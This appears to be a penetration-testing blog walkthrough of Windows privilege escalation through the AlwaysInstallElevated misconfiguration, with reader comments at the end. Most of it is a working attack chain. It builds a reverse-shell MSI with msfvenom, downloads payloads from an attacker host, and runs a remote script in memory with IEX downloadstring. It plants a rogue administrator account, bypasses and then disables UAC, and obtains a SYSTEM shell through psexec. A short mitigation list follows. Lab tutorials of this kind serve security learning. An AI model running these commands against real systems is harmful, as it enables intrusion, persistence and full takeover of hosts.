Privilege Escalation

Windows Privilege Escalation (AlwaysInstallElevated)

Overview

AlwaysInstallElevated is a Windows misconfiguration that lets any authenticated user install MSI packages with SYSTEM privileges. When an administrator enables the matching Group Policy under both the Computer and User Configuration, Windows Installer executes every MSI in the context of NT AUTHORITY\SYSTEM, regardless of who launches it. This article demonstrates end-to-end exploitation inside the pentest.local lab domain. We configure the vulnerable policy, confirm it from a low-privileged foothold, escalate automatically with Metasploit, reproduce the result manually with a msfvenom-crafted MSI, plant a rogue local administrator through a second MSI, and finally weaponise that account for remote SYSTEM access after disabling UAC.

Table of Contents:

  • Introduction to the Tool
  • Configuring the Vulnerable Policy
  • Confirming the Misconfiguration from a Foothold
  • Automated Escalation with Metasploit
  • Manual Exploitation with msfvenom
  • Planting a Rogue Local Administrator
  • Remote Access and Full Compromise
  • Mitigation Strategies
  • Conclusion

Introduction to the Tool

Windows Installer (msiexec.exe) is the native service that installs, repairs, and removes software packaged as .msi files. Two registry values control its privilege behaviour: HKLM\Software\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated and the identical key under HKCU. Both must equal 1 for the elevation to take effect. Attackers abuse this by wrapping a payload inside an MSI and calling msiexec; the installer then runs the embedded action as SYSTEM. Across this walkthrough we chain several standard offensive tools to expose every path this single flaw opens: Metasploit’s always_install_elevated module, msfvenom for building malicious MSIs, NetExec and Impacket for remote authentication, and Invoke-RunasCs for token manipulation and UAC bypass.

Configuring the Vulnerable Policy

To reproduce the flaw, an administrator opens Server Manager on the domain controller and launches the Group Policy Management console from the Tools menu.

Tools → Group Policy Management

Inside the console, expand Forest → Domains → pentest.local, right-click Default Domain Policy, and select Edit to open the Group Policy Management Editor.

Right-click "Default Domain Policy" → Edit

Under Computer Configuration, browse to Policies → Administrative Templates → Windows Components → Windows Installer and locate the setting named “Always install with elevated privileges.”

Computer Configuration → Policies → Administrative Templates → Windows Components → Windows Installer

Open the policy, select Enabled, and apply the change. This directs Windows Installer to install any MSI with elevated rights.

Set “Always install with elevated privileges” → Enabled

The same policy exists under User Configuration and only takes effect when both locations are enabled. Repeat the identical step on the User Configuration side to complete the misconfiguration.

User Configuration → Policies → Administrative Templates → Windows Components → Windows Installer → Enabled

Refresh the policy from an administrative command prompt so the change applies immediately rather than waiting for the next refresh cycle.

gpupdate /force

Confirming the Misconfiguration from a Foothold

With a Meterpreter handler staged on the Kali host (LHOST 192.168.1.8, LPORT 443), a low-privileged reverse_tcp session lands on the target EWIN10. The sysinfo output confirms a Windows 10 1809 x64 host joined to the PENTEST domain.

use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost eth0
set lport 443
run
sysinfo

Inside the session, whoami /priv returns a restricted token with no dangerous privileges. Querying both registry hives then confirms AlwaysInstallElevated is set to 0x1 under HKCU and HKLM, marking the host as exploitable.

whoami /priv
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\Software\Policies\Microsoft\Windows\Installer

Automated Escalation with Metasploit

Metasploit automates the entire attack. The always_install_elevated module builds a malicious MSI, uploads it to the user’s Temp directory, and triggers msiexec, which runs the package as SYSTEM. A fresh Meterpreter session returns with a full privilege set; dropping into a shell and running whoami /priv confirms SYSTEM-level rights.

use exploit/windows/local/always_install_elevated
set session 3
run
shell
whoami /priv

Manual Exploitation with msfvenom

For a hands-on approach, craft a reverse-shell MSI with msfvenom and serve it over a simple HTTP server on the attacker machine.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.8 lport=4444 -a x64 --platform windows -f msi -o ignite.msi
python -m http.server 80

On the target, download the MSI and install it silently with msiexec. The /quiet and /qn switches suppress any interface, and the elevated policy runs the package as SYSTEM.

powershell wget http://192.168.1.8/ignite.msi -o ignite.msi
msiexec /quiet /qn /i ignite.msi

The netcat listener catches the callback, and whoami returns nt authority\system — a manual SYSTEM shell obtained without Metasploit’s post-exploitation module.

rlwrap nc -lvnp 4444

Planting a Rogue Local Administrator (newlocaladmin.msi)

The same primitive supports persistence. First enumerate existing accounts with net user, then fetch a second MSI crafted to create an administrator.

net user
powershell wget http://192.168.1.8/newlocaladmin.msi -o newlocaladmin.msi

Install the MSI silently. It creates the local account “amit” with a known password and adds it to the Administrators group. The follow-up net user and net localgroup administrators commands confirm the new privileged account.

msiexec /quiet /qn /i newlocaladmin.msi
net user
net localgroup administrators

Remote Access and Full Compromise

NetExec validates amit’s credentials over SMB with –local-auth and reports success. Impacket’s psexec, however, fails: remote UAC token filtering strips the administrative rights of a non-RID-500 local admin, so neither ADMIN$ nor C$ is writable.

nxc smb 192.168.1.10 -u amit -p 'Password123!' --local-auth
impacket-psexec amit:'Password123!'@192.168.1.10

To defeat that restriction, load Invoke-RunasCs into memory and run a command as amit with an elevated token via -BypassUac. The whoami /priv output now returns the full administrative privilege set, proving the elevated context.

powershell
IEX (New-Object Net.Webclient).downloadstring("http://192.168.1.8/Invoke-RunasCs.ps1")
Invoke-RunasCs amit 'Password123!' 'whoami /priv' -ForceProfile -CreateProcessFunction 2 -BypassUac

Using the same elevated context, disable UAC entirely by setting the EnableLUA value to 0. This removes the remote token filtering that blocked psexec.

Invoke-RunasCs amit 'Password123!' 'reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f' -ForceProfile -CreateProcessFunction 2 -BypassUac

Reboot the host so the UAC change takes effect.

Invoke-RunasCs amit 'Password123!' 'shutdown -r -t 0' -ForceProfile -CreateProcessFunction 2 -BypassUac

After the restart, NetExec reports (Pwn3d!) for amit, confirming full remote administrative access. Impacket’s psexec now succeeds — it locates a writable ADMIN$, uploads a service binary, starts the service, and returns a shell as nt authority\system, completing the remote compromise.

nxc smb 192.168.1.10 -u amit -p 'Password123!' --local-auth
impacket-psexec amit:'Password123!'@192.168.1.10
whoami

 

Mitigation Strategies

  • Disable the policy: set “Always install with elevated privileges” to Not Configured or Disabled under both Computer and User Configuration, then confirm both registry keys are absent or 0.
  • Audit regularly: query HKLM and HKCU for AlwaysInstallElevated across the estate and alert on any host where the value equals 1.
  • Restrict MSI execution: enforce application control (AppLocker or WDAC) so only signed, approved installers run, and block user-writable paths as installation sources.
  • Enforce UAC: keep EnableLUA set to 1 and monitor for changes; disabling UAC is a strong indicator of compromise.
  • Apply least privilege: avoid granting standard users any mechanism to run installers as SYSTEM, and review Group Policy baselines against CIS benchmarks.
  • Monitor behaviour: flag msiexec spawning shells, network utilities, or account-creation commands, and watch for new local administrators and anomalous SMB service creation.

Conclusion

AlwaysInstallElevated is a deceptively small setting with a catastrophic impact. A single Group Policy toggle converts every low-privileged user into a full SYSTEM operator through the trusted Windows Installer service. This walkthrough showed that once both registry keys read 0x1, an attacker escalates in seconds — automatically through Metasploit, manually through a msfvenom MSI, or persistently by planting a rogue administrator and pivoting remotely. Because the technique relies on legitimate, signed system components, it leaves a light footprint and evades many detection controls, making prevention far more reliable than response.

6 thoughts on “Windows Privilege Escalation (AlwaysInstallElevated)”

  1. I could do an article where privilege escalation with the service path will be explained without quotes

  2. honestly the hacking articles has been of much help in my learning thank you for good work in cyber security

Leave a Reply

Your email address will not be published. Required fields are marked *